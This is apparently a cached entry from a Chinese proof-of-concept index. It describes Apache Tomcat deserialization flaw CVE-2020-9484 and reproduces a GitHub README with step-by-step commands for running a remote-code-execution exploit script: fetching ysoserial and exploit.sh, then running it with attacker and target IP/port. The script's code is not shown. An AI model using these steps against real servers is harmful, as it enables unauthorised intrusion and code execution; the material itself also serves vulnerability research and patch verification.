POC详情: 8aa2b506325922913bbb87d4c6447e942672adfa

来源
https://github.com/d3fudd/CVE-2020-9484_Exploit
关联漏洞
标题: Apache Tomcat 代码问题漏洞 (CVE-2020-9484)
描述:Apache Tomcat是美国阿帕奇(Apache)基金会的一款轻量级Web应用服务器。该程序实现了对Servlet和JavaServer Page(JSP)的支持。 Apache Tomcat中存在代码问题漏洞。攻击者可通过控制服务器上文件的内容和名称等方法利用该漏洞执行代码。以下产品及版本受到影响:Apache Tomcat 10.0.0-M1版本至10.0.0-M4版本,9.0.0.0.M1版本至9.0.43之前版本,8.5.0版本至8.5.63之前版本,7.0.0版本至7.0.108之前版本。
描述
Exploit for Apache Tomcat deserialization (CVE-2020-9484) which could lead to RCE
介绍
# CVE-2020-9484_Exploit

Exploit for Apache Tomcat deserialization (CVE-2020-9484) which could lead to RCE

Affected versions:
- Apache Tomcat 10.x < 10.0.0-M5
- Apache Tomcat 9.x < 9.0.35
- Apache Tomcat 8.x < 8.5.55
- Apache Tomcat 7.x < 7.0.104
<br>

```
git clone https://github.com/frohoff/ysoserial
```
```
cd ysoserial/
```
```
wget https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar
```
```
curl -s https://raw.githubusercontent.com/d3fudd/CVE-2020-9484_Exploit/main/exploit.sh > exploit.sh
```
```
exploit.sh [your IP] [your port] [target IP] [target port]
```
文件快照

 [4.0K]  /data/pocs/8aa2b506325922913bbb87d4c6447e942672adfa
├── [3.7K]  exploit.sh
└── [ 599]  README.md

0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。